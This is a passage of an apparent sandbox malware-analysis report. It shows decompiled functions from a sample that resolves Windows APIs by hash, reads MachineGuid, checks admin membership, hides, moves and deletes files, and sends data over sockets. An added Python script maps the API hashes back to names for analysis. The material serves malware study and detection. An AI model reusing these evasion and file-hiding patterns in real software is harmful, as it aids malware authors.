                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser_wmemset
                    • String ID: CA
                    • API String ID: 2078537776-1052703068
                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                    				int _t7;
                    				void* _t8;
                    
                    				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                    				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                    				return _t7;
                    			}

                    Instruction addresses: 0x00406094 to 0x004060ab

                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                    				_Unknown_base(*)()* _t5;
                    				void* _t6;
                    
                    				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                    				_t1 =  &_a8; // 0x403173
                    				_t5 = GetProcAddress(_a4,  *_t1); // executed
                    				return _t5;
                    			}

                    Instruction addresses: 0x00402c10 to 0x00402c1e

                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00404A52(void* _a4, char* _a8, char* _a12) {
                    				void* _v8;
                    				int _v12;
                    				void* __ebx;
                    				char* _t10;
                    				long _t13;
                    				char* _t27;
                    
                    				_push(_t21);
                    				_t27 = E00402B7C(0x208);
                    				if(_t27 == 0) {
                    					L4:
                    					_t10 = 0;
                    				} else {
                    					E00402B4E(_t27, 0, 0x208);
                    					_v12 = 0x208;
                    					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                    					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                    					if(_t13 != 0) {
                    						E00402BAB(_t27);
                    						goto L4;
                    					} else {
                    						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                    						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                    						E00404A39(_v8); // executed
                    						_t10 = _t27;
                    					}
                    				}
                    				return _t10;
                    			}

                    Instruction addresses: 0x00404a56 to 0x00404ad9

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402B7C(long _a4) {
                    				void* _t4;
                    				void* _t7;
                    
                    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                    				_t7 = _t4;
                    				if(_t7 != 0) {
                    					E00402B4E(_t7, 0, _a4);
                    				}
                    				return _t7;
                    			}

                    Instruction addresses: 0x00402b8c to 0x00402baa

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 40%
                    			E004060BD(void* __eflags) {
                    				signed int _v8;
                    				char _v12;
                    				short _v16;
                    				char _v20;
                    				void* __ebx;
                    				intOrPtr* _t12;
                    				signed int _t13;
                    				intOrPtr* _t14;
                    				signed int _t15;
                    				void* _t24;
                    
                    				_v16 = 0x500;
                    				_v20 = 0;
                    				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                    				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                    				_v8 = _t13;
                    				if(_t13 != 0) {
                    					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                    					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                    					asm("sbb eax, eax");
                    					_v8 = _v8 &  ~_t15;
                    					E0040604F(_v12);
                    					return _v8;
                    				}
                    				return _t13;
                    			}

                    Instruction addresses: 0x004060c6 to 0x0040612f

                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    Uniqueness Score: -1.00%
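Added example, not part of the Joe Sandbox report and not the sample's own code: every KERNELBASE/ADVAPI32 call in the functions above is preceded by E004031E5(ctx, module_index, hash, 0, 0), the sample's API-hash resolver. The script below reads a decompiled listing in this report's format and builds the hash-to-API table from it. Where the resolver is followed by a direct call (E004042CF, E00404A52, E00412D31, E00402C03, E00403C62 above) the name is taken from the next statement; where the resolved pointer is called indirectly, as in E004060BD (`*_t12(...)`, `*_t14(...)`), the name is recovered from the "APIs" annotations, in which the hash is still visible among the recorded stack arguments (E3B938DF next to CheckTokenMembership). The hashing algorithm itself is not derived here. SAMPLE_REPORT is an excerpt copied from the listing above; the E004060BD hash 0xf3a0c470 is named nowhere in the report and is deliberately left unresolved.

```python
import re

# Added example (not report or sample code): build the API-hash -> API-name
# table from a decompiled listing in this report's format. The sample resolves
# imports through E004031E5(ctx, module_index, hash, 0, 0) and calls the result
# on the next statement, either directly (the decompiler prints the API name)
# or through a pointer (*_tN(...), name not printed).

RESOLVER = "E004031E5"
RESOLVER_CALL = re.compile(r"\b" + RESOLVER + r"\([^)]*?0x([0-9a-fA-F]{8})")
DIRECT_CALL = re.compile(r"^(?:_t\d+\s*=\s*)?([A-Z][A-Za-z0-9_]*)\(")
INTERNAL = re.compile(r"^[EL][0-9A-F]{8}$")          # the decompiler's own function names
API_ANNOTATION = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\.[A-Z0-9_]+\(([^)]*)\)")


def parse_api_hashes(report_text):
    """Return {hash: api_name_or_None} for every resolver call in the text."""
    lines = report_text.splitlines()
    table, annotations = {}, []
    for i, line in enumerate(lines):
        if ", ref:" in line:                          # an "APIs" annotation line
            m = API_ANNOTATION.search(line)
            if m:
                annotations.append((m.group(1), m.group(2).upper().split(",")))
            continue
        m = RESOLVER_CALL.search(line)
        if not m:
            continue
        h, name = int(m.group(1), 16), None
        # Pass 1: the first non-empty statement after the resolver is the call it fed.
        for nxt in lines[i + 1:]:
            nxt = nxt.strip()
            if not nxt:
                continue
            d = DIRECT_CALL.match(nxt)
            if d and not INTERNAL.match(d.group(1)):
                name = d.group(1)
            break
        table[h] = name
    # Pass 2: for indirect calls the hash is usually still on the stack when the
    # API executes, so it shows up among the recorded arguments of that API's
    # annotation. Accept it only when exactly one API carries the hash.
    for h in [k for k, v in table.items() if v is None]:
        hits = {api for api, args in annotations if f"{h:08X}" in args}
        if len(hits) == 1:
            table[h] = hits.pop()
    return table


# Excerpt copied from the listing above (E004042CF and E004060BD with their
# "APIs" annotations), used here as constructed sample input.
SAMPLE_REPORT = """
E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
    E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
    _t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
    _t21 = _t7;
    if(_t21 != 0xffffffff) {
        E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
        _t10 = SetFilePointer(_t21, 0, 0, 2); // executed
        if(_t10 != 0xffffffff) {
            E004031E5(_t14, 0, 0xc148f916, 0, 0);
            WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
        }
        E00403C40(_t21); // executed
    }
}
APIs
• CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
• WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
E004060BD(void* __eflags) {
    _v16 = 0x500;
    _v20 = 0;
    _t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
    _t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
    if(_t13 != 0) {
        _t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
        _t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
    }
}
APIs
• CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
"""

if __name__ == "__main__":
    for h, api in sorted(parse_api_hashes(SAMPLE_REPORT).items()):
        print(f"0x{h:08x}  {api or '<unresolved>'}")
```

Run against the whole report rather than the excerpt, the table grows by one entry per resolver call; the hash constants themselves can then be searched for as little-endian dwords in other memory dumps that carry the same resolver.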

                    C-Code - Quality: 100%
                    			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                    				void* _t3;
                    				int _t5;
                    
                    				_t3 = E00403D4D(__eflags, _a4); // executed
                    				if(_t3 == 0) {
                    					__eflags = 0;
                    					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                    					_t5 = CreateDirectoryW(_a4, 0); // executed
                    					return _t5;
                    				} else {
                    					return 1;
                    				}
                    			}

                    Instruction addresses: 0x00403c68 to 0x00403c8f

                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0040642C(void* __eflags) {
                    				short _v40;
                    				intOrPtr* _t6;
                    				void* _t10;
                    
                    				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                    				 *_t6( &_v40); // executed
                    				return 0 | _v40 == 0x00000009;
                    			}

                    Instruction addresses: 0x0040643c to 0x00406454

                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				intOrPtr _t5;
                    
                    				_t5 = _a12;
                    				if(_t5 == 0) {
                    					_t5 = E00405D0B(_a8) + 1;
                    				}
                    				__imp__#19(_a4, _a8, _t5, 0); // executed
                    				return _t5;
                    			}

                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000,?,0041411D,00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                    				int _t6;
                    				void* _t7;
                    
                    				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                    				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                    				return _t6;
                    			}

                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040427D(WCHAR* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                    				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                    				return _t4;
                    			}

                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404A19(void* _a4, short* _a8, void** _a12) {
                    				long _t5;
                    				void* _t6;
                    
                    				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                    				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                    				return _t5;
                    			}

                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C40(void* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                    				_t4 = FindCloseChangeNotification(_a4); // executed
                    				return _t4;
                    			}

                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C08(WCHAR* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                    				_t4 = DeleteFileW(_a4); // executed
                    				return _t4;
                    			}

                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402C1F(WCHAR* _a4) {
                    				struct HINSTANCE__* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                    				_t4 = LoadLibraryW(_a4); // executed
                    				return _t4;
                    			}

                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BEF(void* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                    				_t4 = FindClose(_a4); // executed
                    				return _t4;
                    			}

                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BB7(WCHAR* _a4) {
                    				long _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                    				_t4 = GetFileAttributesW(_a4); // executed
                    				return _t4;
                    			}

                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004049FF(void* _a4) {
                    				long _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                    				_t3 = RegCloseKey(_a4); // executed
                    				return _t3;
                    			}

                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
